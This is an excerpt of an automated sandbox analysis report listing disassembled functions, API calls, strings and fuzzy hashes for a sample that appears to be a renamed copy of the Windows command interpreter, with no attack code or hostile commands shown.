API calls 22473->22475 22474 7ff7cd4a46e1 22481 7ff7cd4872b0 168 API calls 22474->22481 22482 7ff7cd4a45c7 22475->22482 22476 7ff7cd4a455e 22476->22473 22484 7ff7cd487348 168 API calls 22476->22484 22477 7ff7cd4a44e2 22487 7ff7cd4872b0 168 API calls 22477->22487 22478->22477 22486 7ff7cd487348 168 API calls 22478->22486 22479->22473 22479->22476 22492 7ff7cd487348 168 API calls 22479->22492 22480->22470 22488 7ff7cd4a4738 22481->22488 22485 7ff7cd487348 168 API calls 22482->22485 22483->22474 22497 7ff7cd4a46c7 22483->22497 22498 7ff7cd4a46ea 22483->22498 22484->22473 22491 7ff7cd4a45db 22485->22491 22486->22477 22489 7ff7cd4a44f1 22487->22489 22490 7ff7cd487348 168 API calls 22488->22490 22494 7ff7cd4872b0 168 API calls 22489->22494 22490->22455 22493 7ff7cd487348 168 API calls 22491->22493 22492->22476 22495 7ff7cd4a45ec 22493->22495 22496 7ff7cd4a4503 22494->22496 22500 7ff7cd487348 168 API calls 22495->22500 22496->22470 22502 7ff7cd487348 168 API calls 22496->22502 22497->22474 22503 7ff7cd487348 168 API calls 22497->22503 22499 7ff7cd487348 168 API calls 22498->22499 22499->22474 22501 7ff7cd4a4600 22500->22501 22504 7ff7cd487348 168 API calls 22501->22504 22502->22455 22503->22474 22504->22455 22512 7ff7cd48735d 22505->22512 22506 7ff7cd483278 166 API calls 22507 7ff7cd4a4820 longjmp 22506->22507 22508 7ff7cd4a4838 22507->22508 22509 7ff7cd483278 166 API calls 22508->22509 22510 7ff7cd4a4844 longjmp 22509->22510 22511 7ff7cd4a485a 22510->22511 22513 7ff7cd487348 166 API calls 22511->22513 22512->22506 22512->22508 22512->22512 22519 7ff7cd4873ab 22512->22519 22514 7ff7cd4a487b 22513->22514 22515 7ff7cd487348 166 API calls 22514->22515 22516 7ff7cd4a48ad 22515->22516 22517 7ff7cd487348 166 API calls 22516->22517 22518 7ff7cd4872ff 22517->22518 22518->22457 22518->22463 22521 7ff7cd487401 22520->22521 22521->22470 22522 7ff7cd487348 168 API calls 22521->22522 22523 7ff7cd4a487b 22522->22523 22524 7ff7cd487348 168 API calls 22523->22524 22525 7ff7cd4a48ad 
22524->22525 22526 7ff7cd487348 168 API calls 22525->22526 22527 7ff7cd4a48be 22526->22527 22527->22470
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                        • API String ID: 3305344409-4288247545
                                        • Opcode ID: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                        • Instruction ID: f59f466bf3d194420bf07580d70786908cb9e20fd8e180badbe2ab844d814d04
                                        • Opcode Fuzzy Hash: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                        • Instruction Fuzzy Hash: 3C42D821B0CA8285EB60BF1298446B9A7A6AF857B5FC44135DF2E477D4FF3CE6458320

                                        Control-flow Graph (graph not reproduced)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                        • String ID: :$:$:$:ON$OFF
                                        • API String ID: 972821348-467788257
                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction ID: 0d22c9a4b0c31640e32dad20064c3190ec93bd06ff7c4d8b9a73e75567398a24
                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction Fuzzy Hash: 2522C421B0C74286EB54BF629854278E696EF54BA0FC88035CF2E87795FF7CA644C720

                                        Control-flow Graph (graph not reproduced)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InfoLocale$DefaultUsersetlocale
                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                        • API String ID: 1351325837-2236139042
                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction ID: b2babf9aa371426257b97580b03aacec08c68d66b1f47fcb807a0b6a28bfa055
                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction Fuzzy Hash: F6F14A21B0CA4295EF21AF12D5106B9B6AABF54BA0FD44136CF2D57694FF3CEA05C360

                                        Control-flow Graph (graph not reproduced)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                        • API String ID: 388421343-2905461000
                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction ID: 955f4deb36f33b898e671ec2c20bc8e7eb73f5ef3a833e9643b8239704732ad8
                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction Fuzzy Hash: EAF14E31B0CA8295EA60AF52E444BB9F7A5FB857A0F844139DF6D42754EF3CE644CB20

                                        Control-flow Graph (graph not reproduced)
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpensrandtime
                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                        • API String ID: 145004033-3846321370
                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction ID: e1c7cb2d574ece889a5a590aefa0558f7204a62cca21a1311226f46b0f8dcc6a
                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction Fuzzy Hash: 6AE1913262CA82D6EB60AF51E44057AF7A5FB98760FC01135EF9E02A54EF7CD644CB20

                                         Control-flow Graph
                                         • Graph render omitted. Function entry 7ff7cd4937d8; API calls on the graph: GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetThreadLocale, GetConsoleOutputCP, GetCPInfo, memset, _setjmp, _setmode.
                                        Similarity
                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                        • API String ID: 2624720099-1920437939
                                        • Opcode ID: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction ID: 0fe49145f9bf2d30ca7e254681b1fa9e8ecc8978aa4994e345a10d6451e7baa3
                                        • Opcode Fuzzy Hash: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction Fuzzy Hash: 3FC1B231F0CA428AF714BF62A444978FAA6FF49774F844139DF2E46691FE3CA6418720

                                         Control-flow Graph
                                         • Graph render omitted. Function entry 7ff7cd49823c; API calls on the graph: FindFirstFileExW, GetLastError, FindNextFileW, FindClose, GetProcessHeap, HeapAlloc, HeapReAlloc.
                                        Similarity
                                        • API ID: ErrorFileFindFirstLast
                                        • String ID:
                                        • API String ID: 873889042-0
                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction ID: d5de5088dd78f0923a8a8dc46670348a4b58465f41d834724065a0b6555cb53e
                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction Fuzzy Hash: 28513A36B0DB4296E710AF16E444579FBA6FB99BA1F848131CF2D43350EF3CE6548620

                                         Control-flow Graph
                                         • Graph render omitted. Function entry 7ff7cd492978; API calls on the graph: FindFirstFileW, FindClose, _wcsnicmp, _wcsicmp, memmove.
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction ID: b3cf702627eb1424f6585d36a976f923506730957eb3242a0acb53d3a9686309
                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction Fuzzy Hash: 8B510A22B0D68196EA30AF16A544A7AE296FB54BB4FC45230DF7E076D1FF3CE6418710

                                         Control-flow Graph
                                         • Graph render omitted. Function entry 7ff7cd494d5c; API calls on the graph: InitializeCriticalSection, SetConsoleCtrlHandler, _get_osfhandle, GetConsoleMode, GetCommandLineW, GetConsoleOutputCP, GetCPInfo, GetProcessHeap, HeapAlloc, GetConsoleTitleW, GetWindowsDirectoryW, GetStdHandle, GetConsoleScreenBufferInfo, GetModuleHandleW, GetProcAddress, GlobalFree, free.
                                        APIs
                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494D9A
                                          • Part of subcall function 00007FF7CD4958E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7CD4AC6DB), ref: 00007FF7CD4958EF
                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DBB
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DCA
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DE0
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DEE
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E04
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490589
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD49059E
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905AF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD4905C5
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905EF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD490605
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490632
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD490647
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                          • Part of subcall function 00007FF7CD494AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                          • Part of subcall function 00007FF7CD494AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD495554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7CD494E35), ref: 00007FF7CD4955DA
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495623
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495667
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD4956BE
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495702
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E35
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E81
                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F69
                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F95
                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FB0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FC1
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FD8
                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FF8
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495037
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49504B
                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950DF
                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950F2
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49510F
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495130
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49514A
                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495175
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD493602
                                        Similarity
                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                        • API String ID: 1049357271-3021193919
                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction ID: 84ee1871a17f2f0a977d3808aa3ffb817d6d8cbd0e53727e1156c100f72dfefc
                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction Fuzzy Hash: 8BC14121B0CA4296EA04BF52E814579F6A6FF89BA0FC48135DF2E43755FF3CA6458320

                                         Control-flow Graph
                                         • Graph render omitted. Function entry 7ff7cd493c24; API calls on the graph: GetCurrentDirectoryW, towupper, iswalpha, GetLastError, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, _local_unwind.
                                        Similarity
                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                        • String ID: :
                                        • API String ID: 1809961153-336475711
                                        • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction ID: 429529aa4d0ebf8d1ce851f9278bb34ec020735cdf6d6dc2704783c09c140e57
                                        • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction Fuzzy Hash: 01D17D2270CB8191EA60AF16E4486B9F7A6FB85760F844135DF5E436A8FF3CE645CB10

                                        Control-flow Graph

                                        • Control-flow graph: function at 7ff7cd492394 (nodes 914-979); API calls on the graph: memset, GetModuleFileNameW, _wcsupr, wcschr, wcsrchr, _wcsicmp, ??_V@YAXPEAX@Z
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                        • API String ID: 2622545777-4197029667
                                        • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction ID: cc76b106986b887df7b32274dd9022eca5032ce636882b52ebf2766c3929e07b
                                        • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction Fuzzy Hash: B4917F21B0DA4295EE24AF52D854AB8A3A6FF58B64FC44135CF6E47295FE3CE704C720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID: CMD.EXE
                                        • API String ID: 1606018815-3025314500
                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction ID: 29a60f4e52564ba105571b9adc3b067fd57fdd59db2a4144ebf9c66fae0487ad
                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction Fuzzy Hash: DB41CC31B0DA02DBE604AF55E855578BBA1BB99771FC89179CF2E42360EF3DA604C620

                                        Control-flow Graph

                                        • Control-flow graph: function at 7ff7cd48c620 (nodes 992-1113); API calls on the graph: GetConsoleTitleW, SetConsoleTitleW, GetLastError, towupper, wcsncmp, wcschr
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitlewcschr
                                        • String ID: /$:
                                        • API String ID: 2364928044-4222935259
                                        • Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                        • Instruction ID: 8f571fb85f9a1f73d9cef481c7cdf4a233d53ae82f206b9040e91fb5fa649a2a
                                        • Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                        • Instruction Fuzzy Hash: 20C17E61B0C64281EA54BF16D814679E2A2EF90BB0FC45131DF6E872D5FF3CEA448720

                                        Control-flow Graph

